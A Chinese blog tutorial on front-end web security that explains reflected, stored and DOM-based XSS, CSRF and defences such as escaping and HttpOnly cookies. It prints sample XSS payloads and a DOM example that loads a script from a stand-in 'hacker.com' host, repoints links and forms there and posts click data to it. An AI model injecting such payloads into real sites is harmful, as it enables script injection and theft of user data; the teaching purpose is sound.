前端网络---网络安全

已于 2024-04-21 18:43:38 修改
阅读量623 收藏 4
点赞数 30
文章标签: 前端 web安全 安全
于 2024-04-18 20:51:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47808575/article/details/137934173
版权

「前端食堂」想进大厂必须要知道的Web安全问题 - 掘金

网络安全之xss攻击

XSS 攻击是跨站脚本攻击,是一种代码注入攻击。攻击者通过在网站注入恶意脚本,使之在用户的浏览器上运行,从而盗取用户的信息如 cookie 等。

XSS 的本质是因为网站没有对恶意代码进行过滤,与正常的代码混合在一起了,浏览器没有办法分辨哪些脚本是可信的,从而导致了恶意代码的执行。

黑客利用xss攻击可能做的事情

1、获取页面的数据,例如,dom、cookie、localStorage

2、dos攻击。发送合理请求,占用服务器资源,使用户无法访问服务器

3、破坏页面结构

4、流量劫持,将链接指向某个网站

xss攻击可以分为反射型、存储型、DOM型

反射型

恶意 JavaScript 脚本属于用户发送给网站请求中的一部分,随后网站又将这部分返回给用户,恶意脚本在页面中被执行。一般发生在前后端一体的应用中,服务端逻辑会改变最终的网页代码。

会和后段有交互

存储型

黑客将恶意 JavaScript 脚本长期保存在服务端数据库中,用户一旦访问相关页面数据,恶意脚本就会被执行。常见于搜索、微博、社区贴吧评论等。会和后段有交互

DOM型

黑客将恶意 JavaScript 脚本注入到web应用程序中,通常是指攻击者通过操作页面的DOM对象模型来改变页面的内容或行为,从而可能实施攻击。仅仅发生在前端

xss攻击的案例

反射型攻击的案例

正常发送消息:

http://www.test.com/message.php?send=Hello,World!

接收者将会接收信息并显示Hello,Word

非正常发送消息:

http://www.test.com/message.php?send=<script>alert(‘foolish!’)</script>!

接收者接收消息显示的时候将会弹出警告窗口

试想如果不是弹出弹窗而是获取你的cookie或者任何的登录标识呢?是不是就可以拿到你的信息来做一些事情呢?

存储型攻击的案例

比如用户评论功能,输入一段<script>alert(‘xss’)</script>脚本,并提交保存到服务器,由于评论具有公开性,是不是每一个进入到该网站查看评论都可以被攻击?

DOM型攻击的案例

var script = document.createElement('script');
script.src = 'http://hacker.com/malicious-code.js';
document.head.appendChild(script);
document.querySelector('a').href = 'http://hacker.com';
document.querySelector('form').action = 'http://hacker.com';
document.addEventListener('click', function(event) {
    // 发送数据到恶意网址
    var xhr = new XMLHttpRequest();
    xhr.open('POST', 'http://hacker.com/log-clicks', true);
    xhr.send('x=' + event.clientX + '&y=' + event.clientY);
});

比如以上代码,通过操作dom,或者监听用户的点击动作,可以添加一些有害脚本

xss三种攻击类型的区别

1、反射型的攻击存在URL中

2、存储型的攻击存在数据库中

3、DOM型的攻击主要利用web端的代码漏洞,使浏览器执行恶意代码,属于js的漏洞

xss攻击防范方法

1、输入格式校验

2、过滤<script>、<iframe>等标签

3、对要渲染的内容进行编码转义

4、限制输入长度

5、对cookie设置httphttp only

网络安全之csrf攻击

CSRF (Cross-site request forgery,跨站请求伪造)也被称为One Click Attack或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户请求受信任的网站。

csrf攻击防范方法

1、尽量使用post请求

2、加入验证码

3、验证Referer

4、Anti  SCRF  Token

5、加入自定义的Header

一些请求头的设置

sec-fetch-site :表示一个请求发起的来源和目标资源来源之间的关系
 cross-site:跨域请求
 same-origin:同源请求
 none: 不是同源也不是跨域,请求与任意上下文无关。比如浏览器窗口中拖放一个文件

sec-fetch-user: 表示一个导航请求是否由用户激活触发(如用户主动点击鼠标、键盘)。

Sec-Fetch-User: ?0   否                
Sec-Fetch-User: ?1   是

LLLuckyGirl~
关注
  • 30
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
网络安全-前端安全-防御手段.pdf
10-23
网络安全 - 前端安全 - 防御手段 一、课前准备 在学习网络安全前端安全防御手段之前,需要了解基本的网络安全知识和前端开发基础。同时,需要了解密码学和加密技术的基本概念。 二、课堂主题 本节课主要讲解前端...
网络安全-网络安全数据管理及可视化平台的前端实现.zip
04-03
综上所述,"网络安全-网络安全数据管理及可视化平台的前端实现"这个项目涵盖了前端开发的多个方面,从基础技术到高级特性,都需要深入理解和熟练应用,以构建出一个强大且用户友好的网络安全监控平台。
UPLOAD-LABS详细解题步骤
05-17
UPLOAD-LABS是一个网络安全靶场,旨在帮助用户练习文件上传的安全知识。该靶场提供了多个关卡,每个关卡都有一定的安全挑战和限制,旨在考验用户的安全知识和技术。 在开始之前,需要先下载并安装UPLOAD-LABS靶场。...
前端项目-rusha.zip
09-02
- 安全性:在前端实现部分密码的哈希计算,可以增加用户数据的安全性,防止明文密码在网络中传输。 - 数据一致性:在Web应用中,可以用来验证API返回的数据完整性。 6. **项目结构**: "rusha-master"这个文件名...
前端项目-psl.zip
09-04
总之,"前端项目-psl.zip"是一个基于Public Suffix List的前端解决方案,可以帮助开发者更好地处理和理解域名,提高前端应用的功能性和安全性。它的应用广泛,涵盖了URL处理、数据解析、隐私保护等多个方面,对于...
WHAT - NextJS 的路由系统和 react-router-dom
weixin_58540586的博客
07-04 931
不,Next.js 的路由系统并不基于。Next.js 本身内置了自己的路由系统,并且在其生命周期和工作方式上与有所不同。
Javafx利用fxml变换场景的小细节
最新发布
2301_80311013的博客
07-09 499
在这个代码中,在JavaFX中,FXMLLoader是用来加载FXML文件并将其转换为Java对象(例如控制器类)的工具。当您使用FXMLLoaderFXMLLoader在整个过程中,FXMLLoader是使用JavaFX的后台线程(也称为JavaFX线程)来执行这些操作的,这是为了保持UI线程的响应性。这意味着在用户界面(UI)线程中,您不会看到任何阻塞,即使FXMLLoader正在执行耗时的操作。当FXMLLoader完成加载并调用load()方法时,它会返回一个Parent。
HTML_表单 和 表单案例
secret010的博客
07-05 274
【代码】HTML_表单 和 表单案例。
前端javascript中的排序算法之插入排序
峰会路转的博客
07-09 87
【代码】前端javascript中的排序算法之插入排序。
vue父子组件通信实现模糊搜索功能
某站同名 专注毕设项目和免费教程分享
07-09 502
模糊搜索功能 每个网站都要用得到
Haproxy搭建Web群集
wkysdhr的博客
07-08 708
Haproxy 是目前比较流行的一种群集调度工具,同类群集调度工具有很多,如LVS 和Nginx。相比较而言,LVS 性能最好,但是搭建相对复杂;Nginx的upstream模块支持群集功能,但是对群集节点健康检查功能不强,高并发性能没有 Haproxy好。
Vue2前端实现数据可视化大屏全局自适应 Vue实现所有页面自适应 Vue实现自适应所有屏幕
weixin_41346436的博客
07-04 149
在Vue.js中创建一个数据大屏,并使其能够自适应不同屏幕大小,通常涉及到布局的响应式设计、CSS媒体查询、以及利用Vue的事件系统来处理窗口大小变化。通过以上步骤,我们创建了一个使用Vuetify布局的响应式数据大屏,它能够根据屏幕宽度动态调整其内容的布局。Vuetify的v-flex组件允许我们轻松地创建响应式的网格布局,而Vuex和全局事件总线则帮助我们在窗口大小变化时更新应用状态和组件布局。在实际项目中,你可能还需要处理更复杂的响应式设计挑战,例如在不同的屏幕尺寸下显示不同的内容或布局。
JS混淆基本类型和原理
朴拙科技的博客
07-06 563
混淆技术为JS代码提供了一定程度的保护,但同时也给代码的维护和逆向工程带来了挑战。了解和掌握这些混淆技术的原理和解析方法,可以帮助开发者更好地保护或理解JS代码。然而,需要注意的是,混淆并不是万无一失的安全措施,它更多的是增加了攻击者理解代码的难度。在进行逆向工程时,应始终遵守法律法规,尊重知识产权,不要用于非法目的。
​​ 翻页 上一页/下一页
szzlh123456789的博客
07-09 81
【代码】​​ 翻页 上一页/下一页。
音乐播放器
m0_73755059的博客
07-05 572
【代码】音乐播放器。
图片压缩代码和实际操作页面
英雄汉孑的博客
07-05 959
轻盈视界,高清依旧 —— 智能图片压缩,大容量,小体积,精彩不打折
前端如何让网页页面完美适配不同大小和分辨率屏幕
rolling_kitten的博客
07-09 212
安装postcss,项目根目录新建配置文件postcss.config.js,记得别用exclude排除node_modules,否则postcss无法将包里的px样式也一起转为vw;对于el-message组件,单独在项目的index.html文件的style里,设置 .el-message { font-size: 16px;推荐使用postcss插件,它会自动将项目所有的px单位统一转换为vw(包括npm安装的第三方组件),从而实现适配
【web APIs】快速上手Day05(Bom操作)
学习是最低成本的投资
07-04 391
BOM、定时器-延迟函数、JS执行机制、location对象、navigator对象、history对象、本地存储localStorage、数组map 、join方法、综合案例-学生就业信息表实现页面刷新数据不丢失
springboot集成gzip和zip数据压缩传输-满足2k数据自动压缩(适用大数据信息传输)
tiger_Angle
07-02 475
解决方案:在转换为字符串时,一定要使用ISO-8859-1这样的单字节编码。
防火墙前端页面-监控统计
06-03
4. 安全事件告警:对于发现的安全事件,及时发出告警,方便管理员快速响应并解决问题。 5. 日志管理:对防火墙产生的日志进行管理和归档,以便后续的审计和分析。 以上是防火墙前端页面的常见监控统计内容,不同...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值